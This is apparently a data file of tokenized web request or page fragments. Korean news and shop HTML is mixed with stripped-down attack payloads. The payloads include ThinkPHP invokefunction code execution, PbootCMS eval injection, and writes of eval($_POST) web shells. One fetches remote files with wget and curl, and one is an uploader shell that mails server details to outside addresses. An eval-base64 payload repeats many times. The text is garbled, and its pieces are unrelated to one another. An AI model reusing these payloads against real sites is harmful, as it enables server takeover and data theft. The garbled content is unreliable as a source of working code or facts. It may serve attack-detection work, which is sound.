[]
['https', 'img', 'yna', 'co', 'kr', 'photo', 'yna', 'yh', 'pyh', 'p', 'jpg', 'div', 'class', 'img', 'info', 'strong', '撻풔', '처', 'strong', '爛', '米', 'div', 'div', 'div', 'class', 'article', 'ad', 'box', 'div', 'id', 'div', 'gpt', 'ad', 'style', 'width', 'px', 'height', 'px', 'data', 'google', 'query', 'id', 'cnfb', 'bprgeicfyp', 'yaodpjkh', 'q', 'div', 'id', 'google', 'ads', 'iframe', 'korean', 'pc', 'web', 'inarticle', 'x', 'container', 'style', 'border', 'pt', 'currentcolor', 'border', 'image', 'none', 'iframe', 'name', 'google', 'ads', 'iframe', 'korean', 'pc', 'web', 'inarticle', 'x', 'width', 'height', 'title', 'rd', 'party', 'ad', 'content', 'id', 'google', 'ads', 'iframe', 'korean', 'pc', 'web', 'inarticle', 'x', 'frameborder', 'marginwidth', 'marginheight', 'scrolling', 'no', 'style', 'border', 'px', 'currentcolor', 'border', 'image', 'none', 'vertical', 'align', 'bottom', 'data', 'load', 'complete', 'true', 'data', 'google', 'container', 'id', 'iframe', 'div', 'div', 'div', 'p', '처繭', '犬', '첨玲']
['modalpop', '鋼', '底', '玲처', '홴풍', '琯', '체카陋', '念暠', '撻', 'includefile', 'msc', 'doc', 'ctl', 'popupwrap', 'html', 'div', 'plusshop', 'proc', 'cart', 'tab', 'html', 'start', 'div', 'class', 'dn', 'id', 'layerdim', 'ifrmprocess', 'src', 'blank', 'php', 'style', 'display', 'none', 'isproduction', 'block', 'width', 'height', 'isproduction', 'bgcolor', 'iframe', 'end', '甁', '크트', 'customfooter', 'asdasd', 'body', 'html']
['a', 'gb']
['assert', 'index', 'think', 'container', 'invokefunction', 'phpinfo', 'fputs', 'fopen', 'lx', 'php', 'w', 'base', 'decode', 'q', 'sdvh', 'bjw', 'cghwiebldmfskcrfue', 'tvfsnbhgnxsk', 'pz', 'index', 'php']
[]
['fputs', 'fopen', 'base', 'decode', 'ec', 'waha', 'w', 'base', 'decode', 'pd', 'wahagqgv', 'ywwojf', 'qt', 'nuwyd', 'yiddktsgpz', 'ynnozwxs', 'http', 'pboot', 'if', 'eval', 'get', 'a', 'pboot', 'if', 'list', 'index', 'php']
['if', 'a', 'print', 'fputs', 'fopen', 'base', 'decode', 'yy', 'waha', 'w', 'base', 'decode', 'pd', 'wahagqgv', 'ywwojf', 'qt', 'nuw', 'ndktsgpz', 'x', 'endif']
['query', 'string', 'as', 'searchpage', 'area', 'ert', 'searchpage', 'lang', 'se', 'searchpage', 'jq', 'fwrite', 'fopen', 'shell', 'php', 'w', 'php', 'eval', 'post', 'helensb', 'helen', 'if', 'searchpage', 'year', 's', 'searchpage', 'letter', 'rver', 'searchpage', 'ver']
['a', 'gb']
['language', 'xml', 'gb', 'uploads']
['common', 'js', 'typeof']
['index', 'jpg', 'vuln', 'php', 'title', 'vuln', 'patch', 'it', 'now', 'title', 'php', 'function', 'http', 'get', 'url', 'im', 'curl', 'init', 'url', 'curl', 'setopt', 'im', 'curlopt', 'returntransfer', 'curl', 'setopt', 'im', 'curlopt', 'connecttimeout', 'curl', 'setopt', 'im', 'curlopt', 'followlocation', 'curl', 'setopt', 'im', 'curlopt', 'header', 'return', 'curl', 'exec', 'im', 'curl', 'close', 'im', 'check', 'server', 'document', 'root', 'images', 'vuln', 'php', 'text', 'http', 'get', 'http', 'www', 'newsroom', 'comforttaxi', 'com', 'my', 'wp', 'content', 'themes', 'twentyfifteen', 'css', 'ie', 'css', 'open', 'fopen', 'check', 'w', 'fwrite', 'open', 'text', 'fclose', 'open', 'if', 'file', 'exists', 'check', 'echo', 'check', 'br', 'else', 'echo', 'not', 'exits', 'echo', 'done', 'n', 'check', 'server', 'document', 'root', 'vuln', 'htm', 'text', 'http', 'get', 'https', 'pastebin', 'com', 'raw', 'ufawf', 'open', 'fopen', 'check', 'w', 'fwrite', 'open', 'text', 'fclose', 'open', 'if', 'file', 'exists', 'check', 'echo', 'check', 'br', 'else', 'echo', 'not', 'exits', 'echo', 'done', 'n', 'unlink', 'file']
['cbr', 'e', 'cbr', 'eeca', 'eab', 'eb', 'e', 'cec', 'd', 'ec', 'dbc', 'ec', 'db', 'ecb', 'c', 'eb', 'ceba', 'bced', 'c', 'ced', 'acecbba', 'ed', 'ab', 'eba', 'aced', 'b', 'eb', 'fbd', 'ed', 'c', 'ced', 'acecbd', 'ec', 'aa', 'ed', 'c', 'c', 'c', 'b', 'ec', 'bceb', 'c', 'ec', 'ec', 'c', 'ec', 'b', 'eba', 'b', 'eb', 'c', 'ed', 'a', 'c', 'eb', 'dbcec', 'ab', 'eb', 'cec', 'ec', 'c', 'ec', 'db', 'eab', 'eab', 'cec', 'ebb', 'eb', 'eab', 'ceba', 'bc', 'ec', 'b', 'ec', 'b', 'eb', 'bb', 'eab', 'a', 'ebb', 'b', 'eab', 'b', 'eb', 'a', 'eab', 'ceba', 'c', 'eba', 'ec', 'b', 'ecb', 'abeb', 'a', 'eba', 'b', 'ed', 'eba', 'bc', 'ed', 'c', 'eb', 'eba', 'b', 'eca', 'eab', 'eb', 'e', 'c', 'ec', 'db', 'ecbbb', 'ec', 'd', 'ed', 'b', 'eab', 'bced', 'ceb', 'ba', 'eba', 'b', 'eb', 'dbcec', 'ab', 'eb', 'cec', 'ed', 'a', 'eabb', 'ed', 'ceba', 'ec', 'db', 'ed', 'eab', 'a', 'ec', 'bb', 'ec', 'd', 'ec', 'eb', 'facebb', 'ceba', 'aced', 'bb', 'eba', 'c', 'ebb', 'ecb', 'aced', 'b', 'kbo', 'eab', 'adeca', 'c', 'ed', 'debb', 'b', 'ec', 'c', 'ec', 'b', 'ec', 'db', 'ec', 'ab', 'ec', 'bd', 'ec', 'db', 'ec', 'ab', 'ec', 'bdec', 'bceab', 'acec', 'ea', 'ed', 'ec', 'eaceb', 'ba', 'ec', 'db', 'ec', 'acec', 'ea', 'ec', 'd', 'eabcbdec', 'eb', 'ba']
['user', 'password', 'passthru', 'joomla', 'markup', 'echo', 'vuln', 'patch', 'it', 'now', 'vuln', 'htm', 'echo', 'vuln', 'php', 'eval', 'post', 'pass', 'sites', 'default', 'files', 'vuln', 'php', 'echo', 'vuln', 'php', 'eval', 'post', 'pass', 'vuln', 'php', 'cd', 'sites', 'default', 'files', 'echo', 'addtype', 'application', 'x', 'httpd', 'php', 'jpg', 'htaccess', 'wget', 'http', 'k', 'waszmann', 'de', 'deutsch', 'images', 'up', 'php']
['font', 'size', 'pt', 'name', 'inspace', 'pos', 'font', 'size', 'pt', '창', '첩', '遣트', 'span', 'span', 'style', 'font', 'size', 'pt', 'span', 'span', 'style', 'font', 'size', 'pt', 'div', 'style', 'margin', 'bottom', 'px', 'a', 'href', 'http', 'pyeongchang', 'etoday', 'co', 'kr', 'target', 'blank', 'img', 'src', 'images', 'event', 'web', 'view', 'pyeongchang', 'jpg', 'a', 'div', 'span', 'span', 'style', 'font', 'size', 'pt', 'span', 'span', 'style', 'font', 'size', 'pt', '창', '첩', '遣트', 'span', 'span', 'style', 'font', 'size', 'pt', 'span', 'span', 'style', 'font', 'size', 'pt', '美', '旁', 'span', 'span', 'style', 'font', 'size', 'pt', 'span', 'repor']
['page', 'slide', 'giec', 'd', 'eca', 'eb', 'c', 'eb', 'eca', 'c', 'ed', 'a', 'c', 'eab', 'ecb', 'ced', 'eb', 'b', 'eba', 'ec', 'db', 'eb', 'ec', 'aa', 'ec', 'a', 'ed', 'ec', 'ec', 'c', 'eab', 'ebb', 'b', 'eab', 'bd', 'eab', 'bc', 'ec', 'aced', 'd', 'ecb', 'ceca', 'ed', 'a', 'eab', 'ec', 'b', 'eb', 'd', 'ed', 'c', 'ceba', 'c', 'eb', 'f', 'eba', 'a', 'ec', 'd', 'ec', 'db', 'eba', 'eab', 'a', 'ec', 'b', 'ec', 'ea', 'ec', 'b', 'ebb', 'eca', 'b', 'ed', 'eab', 'ceca', 'eab', 'eb', 'a', 'eca', 'eca', 'eb', 'dec', 'eb', 'c', 'ed', 'a', 'c', 'ecb', 'eb', 'c', 'ecb', 'ed', 'bcec', 'b', 'ec', 'ec', 'aceb', 'e', 'eb', 'ba', 'js', 'eb', 'bb', 'ec', 'b', 'c', 'eb', 'c', 'ed', 'a', 'cec', 'ea', 'ec', 'd', 'eab', 'bdebb', 'eab', 'bdec', 'b', 'ec', 'd', 'ec', 'db', 'ed', 'b', 'ebb', 'eab', 'a', 'ecbba', 'ed', 'ab', 'eba', 'aced', 'b', 'eb', 'fbdec', 'db', 'ec', 'eb', 'ba', 'cbr', 'e', 'cbr', 'e', 'ciframe', 'width']
['echo', 'php', 'eval', 'post', 'qazw', 'ycvuzmalrdqpn', 'php', 'php', 'index', 'index', 'think', 'app', 'invokefunction', 'system', 'call', 'user', 'func', 'array']
['none', 'ul', 'gd', 'is', 'login', 'false', 'li', 'a', 'href', 'member', 'join', 'method', 'php', 'img', 'src', 'msc', 'images', 'common', 'ibtn', 'user', 'png', 'span', '회', 'span', 'a', 'li']
['php', 'title', 'vuln', 'patch', 'it', 'now', 'mahfoudup', 'title', 'php', 'echo', 'mahfoudup', 'uname', 'br', 'uname', 'php', 'uname', 'br', 'cwd', 'getcwd', 'echo', 'center', 'form', 'method', 'post', 'target', 'self', 'enctype', 'multipart', 'form', 'data', 'input', 'type', 'file', 'size', 'name', 'uploads', 'input', 'type', 'submit', 'value', 'upload', 'form', 'center', 'td', 'tr', 'table', 'br', 'if', 'empty', 'files', 'uploads', 'move', 'uploaded', 'file', 'files', 'uploads', 'tmp', 'name', 'files', 'uploads', 'name', 'echo', 'script', 'alert', 'upload', 'done', 'script', 'b', 'uploaded', 'b', 'br', 'name', 'files', 'uploads', 'name', 'br', 'size', 'files', 'uploads', 'size', 'br', 'type', 'files', 'uploads', 'type', 'php', 'ip', 'getenv', 'remote', 'addr', 'ra', 'rand', 'subj', 'keyloggers', 'ip', 'email', 'realorokeresult', 'gmail', 'com', 'lakesyd', 'nline', 'outlook', 'com', 'from', 'from', 'bazooka', 'v', 'noreply', 'shells', 'com', 'a', 'server', 'request', 'uri', 'b', 'server', 'http', 'host', 'm', 'ip', 'msg', 'a', 'b', 'm', 'mail', 'email', 'subj', 'msg', 'from', 'up']
['lushdb', 'godomall', 'com', 'contents', 'false', 'e', 'bccc', 'c', 'b', 'cdac', 'd', 'a', 'href', 'save', 'true', 'es', 'bd', 'ingredient', 'es', 'bd', 'ingredient', 'sno', 'sql', 'php']
['php', 'title', 'vuln', 'patch', 'it', 'now', 'mahfoudup', 'title', 'php', 'echo', 'mahfoudup', 'uname', 'br', 'uname', 'php', 'uname', 'br', 'cwd', 'getcwd', 'echo', 'center', 'form', 'method', 'post', 'target', 'self', 'enctype', 'multipart', 'form', 'data', 'input', 'type', 'file', 'size', 'name', 'uploads', 'input', 'type', 'submit', 'value', 'upload', 'form', 'center', 'td', 'tr', 'table', 'br', 'if', 'empty', 'files', 'uploads', 'move', 'uploaded', 'file', 'files', 'uploads', 'tmp', 'name', 'files', 'uploads', 'name', 'echo', 'script', 'alert', 'upload', 'done', 'script', 'b', 'uploaded', 'b', 'br', 'name', 'files', 'uploads', 'name', 'br', 'size', 'files', 'uploads', 'size', 'br', 'type', 'files', 'uploads', 'type', 'php', 'ip', 'getenv', 'remote', 'addr', 'ra', 'rand', 'subj', 'keyloggers', 'ip', 'email', 'realorokeresult', 'gmail', 'com', 'lakesyd', 'nline', 'outlook', 'com', 'from', 'from', 'bazooka', 'v', 'noreply', 'shells', 'com', 'a', 'server', 'request', 'uri', 'b', 'server', 'http', 'host', 'm', 'ip', 'msg', 'a', 'b', 'm', 'mail', 'email', 'subj', 'msg', 'from', 'up']
['echo', 'php', 'action', 'get', 'xcmd', 'system', 'action', 'hydra', 'php', 'php', 'index', 'index', 'think', 'app', 'invokefunction', 'public', 'system', 'call', 'user', 'func', 'array']
['echo', 'php', 'action', 'get', 'xcmd', 'system', 'action', 'hydra', 'php', 'php', 'index', 'index', 'think', 'app', 'invokefunction', 'public', 'system', 'call', 'user', 'func', 'array']
['text', 'javascript', 'src', 'http', 'pub', 'adpnut', 'com', 'ron', 'js', 'c', 'f', 'script', 'p', 'class', 'span', 'style', 'font', 'weight', 'bold', '娩', '訃', '퓜', '탑傘', 'span', 'p', 'p', 'class', '鵑見', '獵', '瀏', '치', '퓜', '濱', '틈']
['https', 'tcc', 'xyz', 'a', 'br', 'a', 'href', 'https', 'tcc', 'xyz', 'target', 'blank', 'img', 'alt', '煐', 'src', 'https', 'tnt', 'co', 'images', 'logo', 'wood', 'jpg', 'title', 'gmband', 'a', 'a', 'href', 'https', 'tcc', 'xyz', 'a', 'br', '搔', '旅펛g', 'eu', 'org', '캘決', '황트', 'br', '搔', '旅펛g', 'eu', 'org', '캘決', '황트', 'br', 'br', 'iframe', 'src', 'cdn', 'bannersnack', 'com', 'banners', 'bumqz', 'elc', 'embed', 'index', 'html', 'userid', 'width', 'height', 'scrolling', 'no', 'frameborder', 'allowtransparency', 'true', 'allow', 'autoplay', 'allowfullscreen', 'true', 'iframe', '搔', '旅펛g', 'eu', 'org', '캘決', '황搔', '旅펛g', 'eu', 'org', '캘決', '황트', 'a', 'href', 'https', 'tcc', 'xyz', 'target', 'blank', 'img', 'alt', '煐', 'src', 'https', 't']
[]
['https', 'img', 'yna', 'co', 'kr', 'photo', 'cms', 'pcm', 'p', 'jpg', 'div', 'class', 'img', 'info', 'strong', '혼', 'strong', '티譴크', 'div', 'div', 'div', 'class', 'article', 'ad', 'box', 'div', 'id', 'div', 'gpt', 'ad', 'style', 'height', 'px', 'width', 'px', 'data', 'google', 'query', 'id', 'ci', 'bkuwl', 'eecfqkylgodss', 'gga', 'div', 'id', 'google', 'ads', 'iframe', 'korean', 'pc', 'web', 'inarticle', 'x', 'container', 'style', 'height', 'px', 'width', 'px', 'display', 'inline', 'block', 'border', 'image', 'none', 'iframe', 'width', 'height', 'title', 'rd', 'party', 'ad', 'content', 'id', 'google', 'ads', 'iframe', 'korean', 'pc', 'web', 'inarticle', 'x', 'src', 'https', 'tpc', 'googlesyndication', 'com', 'safeframe', 'html', 'container', 'html', 'frameborder', 'marginwidth', 'marginheight', 'scrolling', 'no', 'style', 'vertical', 'align', 'bottom', 'border', 'image', 'none', 'data', 'load', 'complete', 'true', 'data', 'is', 'safeframe', 'true', 'data', 'google', 'container', 'id', 'iframe', 'div', 'div', 'div', 'p', '肩']
['result', 'holddb', 'sub', 'phno', 'phno', 'ioplace', 'p', 'fphcode', 'b', 'fphcode', 'm', 'fphcode', 's', 'tphcode', 'title', '매혹적인', '그녀들의', '란제리', '룩', 'content', '스포츠한국', '윤수정', '기자', '일', '오후', '서울', '성동구', '성수동', '레이어', '에서', '열린', '엠코르셋', '패션쇼', 'the', 'm', 'corset', 'moment', '에', '참석하고', '있다', 'o', 'photo', 'http', 'photo', 'hankooki', 'com', 'arch', 'original', 'p', 'p', 'c', 'jpg', 'r', 'photo', 'http', 'photo', 'hankooki', 'com', 'arch', 'photo', 'p', 'p', 'c', 'jpg', 'thumnail', 'http', 'photo', 'hankooki', 'com', 'arch', 'thumbs', 'p', 't', 'p', 'c', 'jpg', 'photographer', '윤수정', 'uexplain', '사진', '윤수정', '기자', 'pic', 'hankooki', 'com', 'photodate', 'sortkey', 'isoriginal', 'y', 'isportal', 'n', 'isadult', 'n', 'iseyenews', 't', 'isphotodate', 'n', 'istype', 'img', 'img', 'src', 'getrelphotoinfo']
['lushdb', 'godomall', 'com', 'contents', 'false', 'p', '일상에서', '쓰레기', '줄이는', '모습과', '쓰레기없데이', 'gonaked', '해시태그를', '인증해주세요', 'nbsp', 'p', 'br', 'javascript', 'window', 'clipboarddata', 'setdata', 'text', '쓰레기없데이', 'gonaked', '이미지', 'a', 'e', 'bccc', 'c', 'b', 'cdac', 'd', 'save', 'true', 'es', 'bd', 'ingredient', 'es', 'bd', 'ingredient', 'sno', 'sql', 'php']
['유앤아이는', '식품의약품', '안전처로부터', 'seculok', 'acp', 'system', 'aspiron', 's', 'acp', 'system', '국내', '의료기기', '제조허가를', '취득했다고', '일', '공시했다', '해당', '기기는', '목', '디스크', '등', '경추질환을', '치료하는', '전방', '경추고정용플레이트', '정형외과용', '의료기기다', '회사', '측은', '기존', '제품과', '유사한', '외형을', '유지하면서도', '수술', '후', '플레이트와', '나사가', '분리되는', '것을', '방지하는', '락킹기능이', '강화돼', '안전한', '수술이', '가능하도록', '설계됐다', '면서', '국내', '허가를', '통해', '기존', '제품', '품목', '다양화', '및', '매출증대에', '기여할', '것']
['유앤아이는', '식품의약품', '안전처로부터', 'seculok', 'acp', 'system', 'aspiron', 's', 'acp', 'system', '국내', '의료기기', '제조허가를', '취득했다고', '일', '공시했다', '해당', '기기는', '목', '디스크', '등', '경추질환을', '치료하는', '전방', '경추', '고정용플레이트', '정형외과용', '의료기기다', '회사', '측은', '기존', '제품과', '유사한', '외형을', '유지하면서도', '수술', '후', '플레이트와', '나사가', '분리되는', '것을', '방지하는', '락킹기능이', '강화돼', '안전한', '수술이', '가능하도록', '설계됐다', '고', '설명했다', '유앤아이', '정형외과용', '의료기기', '국내', '제조허가', '취득']
['ey', 'ga', 'yb', 'yellowtv', 'javascript', 'window', 'top', 'arachni', 'js', 'namespace', 'taint', 'tracer', 'log', 'execution', 'flow', 'sink', 'dwna', 'im', 'lxa', 'pkg', 'arachni', 'trainer', 'f', 'c', 'fbc', 'b', 'd', 'd', 'f', 'bc', 'c', 'yellowtvlist', 'ga']
['ey', 'ga', 'yb', 'ath', 'ztezo', 'gtn', 'adatrgim', 'yszbf', 'us', 'sfgikuguiev', 'rluul', 'vofh', 'rgw', 'ps', 'amv', 'c', 'kb', 'haw', 'vdhnob', 'lx', 'ld', 'x', 'yellowtv', 'dwna', 'im', 'lxa', 'javascript', 'window', 'top', 'arachni', 'js', 'namespace', 'taint', 'tracer', 'log', 'execution', 'flow', 'sink', 'pkg', 'arachni', 'trainer', 'f', 'c', 'fbc', 'b', 'd', 'd', 'f', 'bc', 'c', 'yellowtvlist', 'ga']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['eval', 'base', 'decode', 'post', 'z', 'qgluav', 'zzxqoimrpc', 'bsyxlfzxjyb', 'jziiwimcipo', 'bzzxrfdgltzv', 'saw', 'pdcgwkttac', 'v', 'x', 'hz', 'ljx', 'f', 'b', 'rlc', 'ydw', 'aw', 'lkdapo', 'vjag', 'oii', 'fcipozskrd', 'kaxjuyw', 'lkcrfu', 'vsvkvswyjtq', 'jjufrfrklmru', 'btuuixsk', 'zwnobyakrc', 'ixhqio', 'lmkhn', 'ynn', 'cigkrcwwldepit', 'ilyipe', 'zvcmvhy', 'gocmfuz', 'uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii', 'iikpzwnobygktc', 'ioiipo', 'zwnobygifdwtiik', 'zgllkck']
['news', 'cat', 'other', 'box', 'int', 'target', 'ul', 'class', 'news', 'cat', 'other', 'list', 'ul', 'div', 'news', 'cat', 'div', 'class', 'news', 'title', 'text', 'h', 'id', 'news', 'title', 'text', 'id', '楣', '架', '堅', '嵐', '타키', '拈', 'h', 'div', 'class', 'news', 'title', 'author', '채', 'end', 'span', 'class', 'news', 'author', 'span', 'class', 'author', 'source', '瞿', 'span', 'b', 'li', 'id', 'j', '方', '嚥둔', '蛋', 'span', 'script', 'type', 'text', 'javascript', 'src', 'static', 'naver', 'net', 'blog', 'share', 'blog', 'sharebutton', 'js', 'v', 'charset', 'utf', 'script', 'script', 'type', 'text', 'javascript', 'var', 'title', 'news', 'title', 'text', 'id', 'text', 'title', 'encodeuricomponent', 'title', 'new', 'shareblog', 'makebutton', 'type', 'c', 'title', 'title', 'scri']
